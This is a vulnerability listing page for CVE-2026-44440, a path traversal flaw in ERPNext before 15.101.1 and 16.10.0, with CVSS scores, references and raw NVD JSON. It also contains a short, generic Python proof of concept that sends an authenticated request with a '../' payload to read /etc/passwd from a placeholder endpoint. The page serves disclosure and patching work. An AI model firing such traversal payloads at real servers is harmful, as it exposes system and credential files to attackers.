CVE-2026-44440

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE

ERPNext < 15.101.1

ERPNext < 16.10.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
target_url = "http://target-ip:8000/api/method/endpoint"

# Authenticated session cookies (required)
cookies = {
    "sid": "your_session_id_here"
}

# Payload attempting to read /etc/passwd
payload = {
    "path": "../../../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful!")
        print(response.text)
    else:
        print(f"[-] Failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44440
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44440
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44440/
[4] VulDB https://vuldb.com/cve/CVE-2026-44440
[5] https://github.com/frappe/erpnext/security/advisories/GHSA-6ffr-92hr-3394

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44440", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:45.007", "lastModified": "2026-05-14T20:11:20.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.101.1", "matchCriteriaId": "59064A28-5E17-4A60-8D27-DCF494639CBB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.10.0", "matchCriteriaId": "00CBBCD6-73CB-4BE3-BE70-0B75E9F4105F"}]}]}], "references": [{"url": "https://github.com/frappe/erpnext/security/advisories/GHSA-6ffr-92hr-3394", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}